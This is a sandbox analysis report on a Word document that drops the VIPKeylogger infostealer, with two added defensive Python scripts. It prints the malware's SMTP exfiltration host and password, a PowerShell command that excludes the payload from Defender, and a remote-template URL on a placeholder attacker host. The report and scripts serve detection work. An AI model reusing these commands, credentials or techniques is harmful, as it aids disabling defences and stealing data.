Analysis
- max time kernel: 132s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 02-10-2024 11:41
Static task: static1
Behavioral task: behavioral1
  Sample: 30092463687563.docx
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 30092463687563.docx
  Resource: win10v2004-20240802-en
General
- Target: 30092463687563.docx
- Size: 264KB
- MD5: da3b3b9590907c35f64e830b2b244ffd
- SHA1: 8393b61a2871bc1ea9cb2c22fa041790ce8fa5b1
- SHA256: 97a4fe736ddd0955e218e7f7fb00d2fddee7896db60aa90e175b4824c9192825
- SHA512: 98d070881920985daa43a793dd5064a4262584f61c34d86d0b51ff9c395ff81712e192b34cef6a1fedb3a274e214f38725b14fdb93aede811043b976ba6a3cf1
- SSDEEP: 6144:AyrTTW+ch8x2ZpfRkdxyl+cOpFVozXHN5dOP:Dwy2O1c0buXHNXc
Malware Config
Extracted
Family: vipkeylogger
Protocol: smtp
Host: hosting2.ro.hostsailor.com
Port: 587
Username: [email protected]
Password: 7213575aceACE@@
Email To: [email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#. It resembles SnakeKeylogger, which was first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow  pid   process
7     2612  EQNEDT32.EXE
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes.
-
Downloads MZ/PE file
-
Abuses the OpenXML format to download a file from an external location
-
Executes dropped EXE 2 IoCs
Processes:
pid   process
2004  wealtken20309.exe
2568  wealtken20309.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid   process
2612  EQNEDT32.EXE
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  wealtken20309.exe
Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  wealtken20309.exe
Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  wealtken20309.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
8     checkip.dyndns.org
-
Drops file in System32 directory 1 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                          pid   process            target process
PID 2004 set thread context of 2568  2004  wealtken20309.exe  wealtken20309.exe
-
Drops file in Windows directory 1 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description  ioc  process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EQNEDT32.EXE
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  wealtken20309.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  wealtken20309.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid   process
2252  WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid   process
2568  wealtken20309.exe
1800  powershell.exe
2568  wealtken20309.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  2568  wealtken20309.exe
Token: SeDebugPrivilege  1800  powershell.exe
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid   process
2252  WINWORD.EXE
2252  WINWORD.EXE
2252  WINWORD.EXE
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
description                       pid   process            target process     count
PID 2612 wrote to memory of 2004  2612  EQNEDT32.EXE       wealtken20309.exe  4
PID 2252 wrote to memory of 1824  2252  WINWORD.EXE        splwow64.exe       4
PID 2004 wrote to memory of 1800  2004  wealtken20309.exe  powershell.exe     4
PID 2004 wrote to memory of 2568  2004  wealtken20309.exe  wealtken20309.exe  9
(21 events in total; identical rows collapsed into the count column)
-
outlook_office_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  wealtken20309.exe
-
outlook_win_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  wealtken20309.exe
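The "Abuses OpenXML format to download file from external location" signature above fires when a .docx package carries a relationship whose TargetMode is External and whose type Word resolves on its own when the document opens (an attachedTemplate in word/_rels/settings.xml.rels is the classic case, and is what delivers the second-stage document that Equation Editor then handles). The Python below is an added example, not part of the sandbox report or of the sample: it unzips a document, walks every .rels part, and separates externally targeted relationships Word loads automatically from inert ones such as hyperlinks. The document it scans is constructed in memory, and the template URL http://attacker.example/wealthzxcv.doc is a placeholder (the report records only the cached filename wealthzxcv[1].doc, not the host it came from).

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word fetches and loads on open without user interaction.
# A hyperlink is also External, but inert until clicked.
AUTO_LOAD_REL_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument"}


def find_external_relationships(docx_bytes):
    """Return every TargetMode="External" relationship in the package.

    Each finding records the .rels part it came from, the short relationship
    type, the target, and whether that type is loaded automatically.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed .rels part deserves a manual look; skipped here
            for rel in root.iter(f"{{{PKG_RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "rels_part": name,
                    "type": rel_type,
                    "target": rel.get("Target", ""),
                    "auto_load": rel_type in AUTO_LOAD_REL_TYPES,
                })
    return findings


def remote_auto_loads(docx_bytes):
    """Only the findings that make Word reach out to the network on open."""
    return [f for f in find_external_relationships(docx_bytes) if f["auto_load"]]


def _rels_xml(*rels):
    """Serialise (type, target, external) triples as a .rels part."""
    body = "".join(
        f'<Relationship Id="rId{i}" Type="{OFFICE_REL_BASE}{t}" Target="{target}"'
        + (' TargetMode="External"' if external else "") + "/>"
        for i, (t, target, external) in enumerate(rels, start=1)
    )
    return (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{PKG_RELS_NS}">{body}</Relationships>')


def build_sample_docx(template_url):
    """Constructed minimal .docx (not the analysed sample) whose settings.xml
    points at a remote attachedTemplate, plus a benign external hyperlink."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", _rels_xml(("officeDocument", "word/document.xml", False)))
        zf.writestr("word/document.xml", f'<?xml version="1.0"?><w:document xmlns:w="{w_ns}"/>')
        zf.writestr("word/settings.xml",
                    f'<?xml version="1.0"?><w:settings xmlns:w="{w_ns}" '
                    f'xmlns:r="{OFFICE_REL_BASE[:-1]}"><w:attachedTemplate r:id="rId1"/></w:settings>')
        zf.writestr("word/_rels/document.xml.rels",
                    _rels_xml(("settings", "settings.xml", False),
                              ("hyperlink", "https://example.com/", True)))
        zf.writestr("word/_rels/settings.xml.rels",
                    _rels_xml(("attachedTemplate", template_url, True)))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://attacker.example/wealthzxcv.doc")  # placeholder URL
    for f in find_external_relationships(sample):
        flag = "AUTO-LOAD" if f["auto_load"] else "inert"
        print(f"{flag:9} {f['rels_part']}: {f['type']} -> {f['target']}")
```

The scanner deliberately keys on TargetMode rather than on the URL scheme: a file:// or UNC target in an attachedTemplate is just as much a remote load (and leaks the victim's NetNTLM hash to the share). Anything it reports as AUTO-LOAD should be fetched only from an isolated sandbox, as the report did here, never from an analyst workstation.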
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE  (PID 2252)
  "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30092463687563.docx"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  └─ C:\Windows\splwow64.exe  (PID 1824)
       C:\Windows\splwow64.exe 12288

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  (PID 2612)
  "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  (started out-of-process as a COM server, so it appears as a separate root rather than as a child of WINWORD.EXE)
  - Blocklisted process makes network request
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  └─ C:\Users\Admin\AppData\Roaming\wealtken20309.exe  (PID 2004)
       "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
       - Executes dropped EXE
       - Suspicious use of SetThreadContext
       - System Location Discovery: System Language Discovery
       - Suspicious use of WriteProcessMemory
       ├─ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1800)
       │    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
       │    (the command line names System32; WOW64 file-system redirection resolves it to SysWOW64 for the 32-bit parent)
       │    - Command and Scripting Interpreter: PowerShell
       │    - Drops file in System32 directory
       │    - System Location Discovery: System Language Discovery
       │    - Suspicious behavior: EnumeratesProcesses
       │    - Suspicious use of AdjustPrivilegeToken
       └─ C:\Users\Admin\AppData\Roaming\wealtken20309.exe  (PID 2568)
            "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
            - Executes dropped EXE
            - Accesses Microsoft Outlook profiles
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - outlook_office_path
            - outlook_win_path
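Read top-down, the process tree is the whole chain: Equation Editor, started via COM from the document, writes a payload into %AppData%\Roaming and launches it; the payload shells out to PowerShell to exclude its own path from Defender, then starts a second copy of itself and calls SetThreadContext on it (the hand-off behind the "Suspicious use of SetThreadContext" signature, typical of process hollowing). The Python below is an added example, not tooling from the sandbox or the report: it encodes those three behaviours as rules and runs them over a flat event list constructed from the PIDs, images and command lines shown in the tree. The event schema is invented for the example; map it onto your EDR's process-creation and cross-process-access telemetry.

```python
import ntpath
import re

# Office document hosts plus the Equation Editor COM server: none of them
# should be launching executables out of user-writable directories.
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "EQNEDT32.EXE"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.IGNORECASE)
# Add-MpPreference with any of its three exclusion switches.
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.IGNORECASE)


def _image(path):
    """Case-folded file name of a Windows image path (ntpath works on any host OS)."""
    return ntpath.basename(path).upper()


def triage(events):
    """Apply three rules to a flat event list and return (rule, pid) alerts.

    Event schema (constructed for this example, not a sandbox or EDR format):
      {"type": "process_create", "pid", "ppid", "image", "cmdline"}
      {"type": "set_thread_context", "source_pid", "target_pid"}
    """
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    alerts = []
    for p in procs.values():
        parent = procs.get(p["ppid"])
        # Rule 1: Office / Equation Editor parent, child image in a user-writable path.
        if parent and _image(parent["image"]) in OFFICE_PARENTS and USER_WRITABLE.search(p["image"]):
            alerts.append(("office_spawns_from_user_dir", p["pid"]))
        # Rule 2: PowerShell adding a Defender exclusion.
        if _image(p["image"]) == "POWERSHELL.EXE" and DEFENDER_EXCLUSION.search(p["cmdline"]):
            alerts.append(("defender_exclusion_via_powershell", p["pid"]))
    for e in events:
        # Rule 3: a process sets the thread context of its own child running the
        # same image, the classic hollowing / RunPE hand-off.
        if e["type"] != "set_thread_context":
            continue
        src, dst = procs.get(e["source_pid"]), procs.get(e["target_pid"])
        if src and dst and dst["ppid"] == src["pid"] and _image(src["image"]) == _image(dst["image"]):
            alerts.append(("self_image_injection", dst["pid"]))
    return alerts


def _proc(pid, ppid, image, cmdline):
    return {"type": "process_create", "pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


# Constructed from the process tree in the report (PIDs, images and command
# lines as shown there; root processes get ppid None).
REPORT_EVENTS = [
    _proc(2252, None, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
          r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30092463687563.docx"'),
    _proc(1824, 2252, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    _proc(2612, None, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
          r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    _proc(2004, 2612, r"C:\Users\Admin\AppData\Roaming\wealtken20309.exe",
          r'"C:\Users\Admin\AppData\Roaming\wealtken20309.exe"'),
    _proc(1800, 2004, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"'),
    _proc(2568, 2004, r"C:\Users\Admin\AppData\Roaming\wealtken20309.exe",
          r'"C:\Users\Admin\AppData\Roaming\wealtken20309.exe"'),
    {"type": "set_thread_context", "source_pid": 2004, "target_pid": 2568},
]


def triage_report_tree():
    return triage(REPORT_EVENTS)


if __name__ == "__main__":
    for rule, pid in triage_report_tree():
        print(f"{rule:36} pid={pid}")
```

splwow64.exe under WINWORD.EXE is the 64-bit print-spooler helper and is deliberately not flagged; the WriteProcessMemory events into it are normal Office behaviour and make a poor detection on their own. On a live host, `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists the exclusions a command like the one at PID 1800 leaves behind, and Defender records the change as event 5007 in the Microsoft-Windows-Windows Defender/Operational log.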
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Exploitation for Client Execution (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (2)
    Credentials In Files (2)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
  Filesize: 128KB
  MD5: 68988d7dd981fa3061f0b32c8627c1ec
  SHA1: 0800a2e4506ba3568047417e440cbf5a21fe8a5c
  SHA256: 7040d17da449308cf2460522e5495ddaffea8edd787b2be52aa15eae552c478c
  SHA512: 1b6fefaf0fb9c5a4858ba6199dc33262409dcbd07a87c8c5c2ab7370f28b1ea34dea5622551a53d45565d1c7d445882390a41e9896aeba3e3d68e003bb63747f
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{96E47E6C-170C-4C3F-98E1-D8B9A741D571}.FSD
  Filesize: 128KB
  MD5: 7d9680f56b3377f37e05ca9b7683f43e
  SHA1: 63c7960b2cc93379aaf9e92799664ab60729d172
  SHA256: b91e1013b2113fe1875a1bb44c962db3756d369160b36f0e4cdda1ce70211024
  SHA512: 073a47bf49442efcfd3d41833292d0257dee8103be89255577169335d5381788c7aef30febcf5ee9ab207dee4fb9e864f9408776960b0b65cd51b120e01adfdf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\wealthzxcv[1].doc
  Filesize: 565KB
  MD5: adbffccbb78834fa492cc7ca8a676e52
  SHA1: 1e5b065d13fa03fb556a7ff315b85db96d369908
  SHA256: 42d08df15b74f7a598895de1590dab57cd973d1b4dd8531f88ac3150260f7e63
  SHA512: de1bb84f11ad4dcf7035699c8b5ca58e098da937a98b8a701ba202671dbb9bf1510434682675b208f3dc804040a9775b11903709f825758e68a19fc9ef2e8b33
-
  Filesize: 128KB
  MD5: afa493144346c84ef2d518ebe8930309
  SHA1: 949d73a0a801d92c04f015df239e9719a62108df
  SHA256: c987711c23a13fe6f2879edf218f2b88a565edf88372958178d755f54a830b3d
  SHA512: f03c4f097e59935a41dd464c947302acdbc801f2f5ff279283cf0ed5872fdcb2f7b846af7c40875fbace7cb53c8ee344d3b5279da3bd25213ef887788bb32da0
-
  Filesize: 412B
  MD5: 64c0da6e5a63888d9890912acced0309
  SHA1: 20151576c22d2469553f31d5f882a0f749800ca4
  SHA256: ecbb43b054e8615b8227e5317d92c7edec0d87de76294c7c61d4175d7dec8f13
  SHA512: 115e97bd2c6a5decd4be01b608844f0d92c1c02c5b3d6afcc0802adda09d33c4d1b3a7482cfa96fbbbce818352e4f3864627d0b3a49544c409b3b407a2cd30d0
-
  Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
  Filesize: 858KB
  MD5: d237ebe34f35a9ffe99f5efe0474c1e2
  SHA1: 573c4774a52cc9ebc7e7408f944ac7f3a27d2fb1
  SHA256: ebf5271d5f3a9a052cd487e949d80ca43d84bb108dd0cf0c773f2139a57c6137
  SHA512: 9393d9605d72382f7dc154e0dfc7aacd7f0f740c0c3ec7fc3e94a366111edbbb1ca2f64b85cd9f12bd7bccad25d74ed16cff19162b44b95127e61ccc227b9f05